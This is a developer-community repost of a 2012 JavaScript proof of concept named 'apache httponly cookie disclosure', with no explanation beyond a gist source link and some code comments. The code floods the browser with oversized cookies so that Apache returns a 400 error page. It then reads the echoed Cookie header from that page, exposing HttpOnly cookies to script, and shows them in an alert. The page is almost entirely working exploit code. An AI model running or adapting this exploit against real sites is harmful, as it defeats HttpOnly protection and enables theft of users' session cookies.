apache httponly cookie disclosure-阿里云开发者社区

apache httponly cookie disclosure

2012-02-01 777

版权

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： // Source: https://gist.github.com/1955a1c28324d4724b7b/7fe51f2a66c1d4a40a736540b3ad3fde02b7...

   
    // Source: https://gist.github.com/1955a1c28324d4724b7b/7fe51f2a66c1d4a40a736540b3ad3fde02b7fb08  
   
     // Most browsers limit cookies to 4k characters, so we need multiple  
    
     function setCookies (good) {  
    
          // Construct string for cookie value   
    
          var str = "";   
    
          for (var i=0; i< 819; i++) {   
    
              str += "x";   
    
          }   
    
          // Set cookies   
    
          for (i = 0; i < 10; i++) {   
    
              // Expire evil cookie   
    
              if (good) {   
    
                  var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";   
    
              }   
    
              // Set evil cookie   
    
              else {   
    
                  var cookie = "xss"+i+"="+str+";path=/";   
    
              }   
    
              document.cookie = cookie;   
    
          }   
    
     }  
    
     function makeRequest() {  
    
          setCookies();   
    
          function parseCookies () {   
    
              var cookie_dict = {};   
    
              // Only react on 400 status   
    
              if (xhr.readyState === 4 && xhr.status === 400) {   
    
                  // Replace newlines and match <pre> content   
    
                  var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);   
    
                  if (content.length) {   
    
                      // Remove Cookie: prefix   
    
                      content = content[1].replace("Cookie: ", "");   
    
                      var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);   
    
                      // Add cookies to object   
    
                      for (var i=0; i<cookies.length; i++) {   
    
                          var s_c = cookies[i].split('=',2);   
    
                          cookie_dict[s_c[0]] = s_c[1];   
    
                      }   
    
                  }   
    
                  // Unset malicious cookies   
    
                  setCookies(true);   
    
                  alert(JSON.stringify(cookie_dict));   
    
              }   
    
          }   
    
          // Make XHR request   
    
          var xhr = new XMLHttpRequest();   
    
          xhr.onreadystatechange = parseCookies;   
    
          xhr.open("GET", "/", true);   
    
          xhr.send(null);   
    
     }  
    
     makeRequest();

apache httponly cookie disclosure

热门文章

最新文章

相关电子书

热门

活动广场

任务中心

开发者评测

高校计划

乘风者计划

训练营

阿里云MVP

话题

直播

下载

镜像站

技术资料

插件

apache httponly cookie disclosure

热门文章

最新文章

相关电子书